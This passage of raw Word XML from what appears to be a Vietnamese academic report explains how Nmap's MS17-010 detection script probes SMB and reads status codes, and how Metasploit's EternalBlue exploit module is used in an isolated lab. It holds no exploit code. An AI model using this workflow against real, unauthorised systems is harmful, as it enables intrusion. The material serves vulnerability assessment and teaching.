          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>"NT LM 0.12"</w:t>
      </w:r>
      <w:r>
        <w:t>) hay không [17].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069465E6" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Script `smb-vuln-ms17-010.nse`:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Đây là kịch bản kiểm tra an toàn tiêu chuẩn (non-intrusive probe) giúp nhận biết dấu hiệu chưa vá MS17-010 mà không thực hiện hành vi khai thác bộ nhớ và không làm gián đoạn dịch vụ [18].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0615CA80" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Cơ chế kỹ thuật chi tiết của script `smb-vuln-ms17-010.nse`:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D064ED8" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Script thiết lập kết nối TCP tới cổng 445, gửi bản tin đàm phán Negotiate yêu cầu dialect SMBv1, sau đó thực hiện thủ tục Session Setup dưới dạng phiên ẩn danh (Anonymous / Null Session) và gửi Tree Connect vào tài nguyên chia sẻ liên tiến trình </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>\\Target\IPC$</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (mặc định tham số </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>sharename</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> là </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>IPC$</w:t>
      </w:r>
      <w:r>
        <w:t>) [18].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460B6CBD" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Khi phiên làm việc với </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>IPC$</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> được thiết lập, script gửi một bản tin yêu cầu giao dịch </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>SMB_COM_TRANSACTION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (opcode </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>0x25</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) với lệnh </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>PeekNamedPipe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (mã </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>0x2300</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) trên đường ống định danh </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>\PIPE\</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> với các tham số độ dài bộ đệm tối đa (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Max Parameter Count = 0xFFFF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Max Data Count = 0xFFFF</w:t>
      </w:r>
      <w:r>
        <w:t>) [18].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F57784F" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Phân tích mã trạng thái phản hồi NT Status theo mã nguồn Nmap:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19AF4CE3" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Dấu hiệu phù hợp hệ thống chưa vá (VULNERABLE):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Nếu máy chủ phản hồi mã lỗi NT Status </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>STATUS_INSUFF_SERVER_RESOURCES</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>0xC0000205</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), driver </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>srv.sys</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> của mục tiêu đang xử lý giao dịch theo nhánh mã nguồn lỗi chưa được vá. Script ghi nhận dấu hiệu này và xuất kết luận </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>State: VULNERABLE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> [18].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7525604D" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Dấu hiệu phù hợp hệ thống đã vá:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Nếu máy chủ phản hồi mã lỗi </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>STATUS_ACCESS_DENIED</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>0xC0000022</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) hoặc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>STATUS_INVALID_HANDLE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>0xC0000008</w:t>
      </w:r>
      <w:r>
        <w:t>), logic script xác định mục tiêu đã được áp dụng bản vá sửa lỗi hoặc từ chối xử lý tham số giao dịch bất thường một cách an toàn. Script ghi nhận trạng thái không có lỗ hổng (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>State: NOT VULNERABLE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) kèm thông báo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>This system is patched</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> [18].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35EC60E3" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Ranh giới kỹ thuật và các trường hợp ngoại lệ của kết luận quét:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484DA221" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Việc diễn giải kết quả từ script kiểm tra cần lưu ý các ranh giới kỹ thuật cụ thể:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6551B8A2" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Ảnh hưởng của chính sách hạn chế kết nối nặc danh:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Trong trường hợp không cung cấp thông tin xác thực, kịch bản kiểm tra </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>smb-vuln-ms17-010.nse</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> phụ thuộc vào việc kết nối ẩn danh tới tài nguyên </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>IPC$</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Nếu truy cập nặc danh tới </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>IPC$</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> bị chặn (như cấu hình </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>RestrictAnonymous = 2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) và người kiểm thử không cung cấp thông tin xác thực phù hợp, kịch bản có thể không hoàn tất được phép thăm dò và không xác định được trạng thái, dù driver </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>srv.sys</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> trên thực tế có thể chưa được vá. Công cụ có hỗ trợ truyền thông tin xác thực thông qua tham số nếu được cấu hình [18].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B25073B" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Ảnh hưởng của thiết bị bảo vệ mạng:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Tường lửa cá nhân hoặc hệ thống ngăn ngừa xâm nhập (IPS) có tính năng DPI có thể cho phép bắt tay TCP ban đầu nhưng ngắt kết nối bằng gói TCP RST ngay khi xuất hiện bản tin Transaction dị thường, dẫn đến việc đánh giá sai lệch trạng thái dịch vụ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269316E3" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Bản chất của kết luận "VULNERABLE":</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kết luận từ công cụ quét chỉ xác nhận </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>máy chủ có phản ứng logic của driver `srv.sys` khớp với mẫu hành vi chưa vá</w:t>
      </w:r>
      <w:r>
        <w:t>. Kết luận này không đồng nghĩa với việc một cuộc tấn công khai thác thực tế chắc chắn sẽ cấp được phiên shell tương tác thành công trong mọi trường hợp, bởi việc khai thác thực tế còn phụ thuộc vào kiến trúc CPU (x86 hay x64), trạng thái phân mảnh của bộ nhớ Non-Paged Pool (có thể gây sập hệ thống BSOD thay vì cấp shell), và sự ngăn chặn của các giải pháp bảo vệ điểm cuối (EDR/Antivirus) [17], [18].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E1BBA2" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1.3.4. Nền tảng kiểm thử Metasploit Framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E82665" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Metasploit Framework là nền tảng kiểm tra xâm nhập mô-đun hóa, hỗ trợ chuẩn hóa quy trình thẩm định an toàn thông tin [13], [19]. Trong phạm vi đề tài, Metasploit được phân bổ hai vai trò rõ ràng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2615C3F0" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Mô-đun phụ trợ (Auxiliary Module):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Sử dụng mô-đun </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>auxiliary/scanner/smb/smb_ms17_010</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> để quét và kiểm tra dấu hiệu lỗ hổng trên dải địa chỉ IP [13]. Cần lưu ý mô-đun này và script NSE của Nmap là hai implementation khác nhau dùng để tham chiếu chéo về mặt phản ứng dịch vụ. Các đối chứng thực sự khác loại bao gồm: bản dựng Windows (build), danh sách Hotfix/KB đã cài đặt, lưu lượng gói tin (packet capture) và trạng thái tính năng SMBv1 trên máy mục tiêu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0AA076" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Mô-đun khai thác có kiểm soát (Exploit Module):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Sử dụng mô-đun </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>exploit/windows/smb/ms17_010_eternalblue</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> trong môi trường phòng thí nghiệm cô lập nhằm thẩm định khả năng thực thi của lỗ hổng CVE-2017-0144 [13]. Payload được giới hạn ở các thao tác xác nhận quyền thực thi; bản thân quá trình khai thác kernel vẫn có nguy cơ gây mất ổn định hoặc phát sinh lỗi màn hình xanh (BSOD), vì vậy thực nghiệm chỉ tiến hành trên máy ảo đã tạo điểm sao lưu phục hồi (snapshot) [13], [16].</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8784"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DB6619" w14:paraId="46B0DE6A" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8784" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="2EBA9347" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>[ Pha 1: Quét cổng ] ──&gt; Nmap (-p 139,445 -sS) ──&gt; Xác định cổng TCP mở</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Pha 2: Định danh ] ──&gt; Nmap (-sV) ─────────────&gt; Nhận diện dịch vụ microsoft-ds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Pha 3: Dấu hiệu ]  ──&gt; Nmap NSE / MSF Aux ─────&gt; Kiểm tra dấu hiệu chưa vá MS17-010</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Pha 4: Thẩm định ] ──&gt; Metasploit (Lab cô lập) ─&gt; Xác minh khả năng thực thi trong lab</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0A515743" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00DB6619"/>
    <w:p w14:paraId="6D8D5524" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Sơ đồ 1.4: Quy trình 4 giai đoạn phối hợp công cụ trong kiểm thử đánh giá an ninh SMB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620841EF" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>1.3.5. Bảng liên kết kiến thức lý thuyết và các bước thực nghiệm lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D65167" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Để tạo cầu nối giữa cơ sở lý thuyết và các thao tác trong mô hình thực nghiệm, Bảng 1.4 đối chiếu từng thành phần kiến thức với mục tiêu quan sát và công cụ tương ứng được triển khai trong lab.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FDC59E" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Bảng 1.4: Đối chiếu kiến thức lý thuyết và các bước thực nghiệm trong lab.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2107"/>
        <w:gridCol w:w="2105"/>
        <w:gridCol w:w="2122"/>
        <w:gridCol w:w="2666"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DB6619" w14:paraId="17D5BBEE" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2196" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF2FA"/>
          </w:tcPr>
          <w:p w14:paraId="33931923" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Khái niệm lý thuyết</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2196" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF2FA"/>
          </w:tcPr>
          <w:p w14:paraId="2D382C48" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Vấn đề kỹ thuật </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>cần làm rõ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2196" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF2FA"/>
          </w:tcPr>
          <w:p w14:paraId="5F079474" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">Bước quan sát / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Thao tác trong lab</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2196" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF2FA"/>
          </w:tcPr>
          <w:p w14:paraId="40D71F3A" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Công cụ sử dụng</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB6619" w14:paraId="1D48620F" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2196" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7D97545A" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Cổng mạng TCP 445 / 139</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2196" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
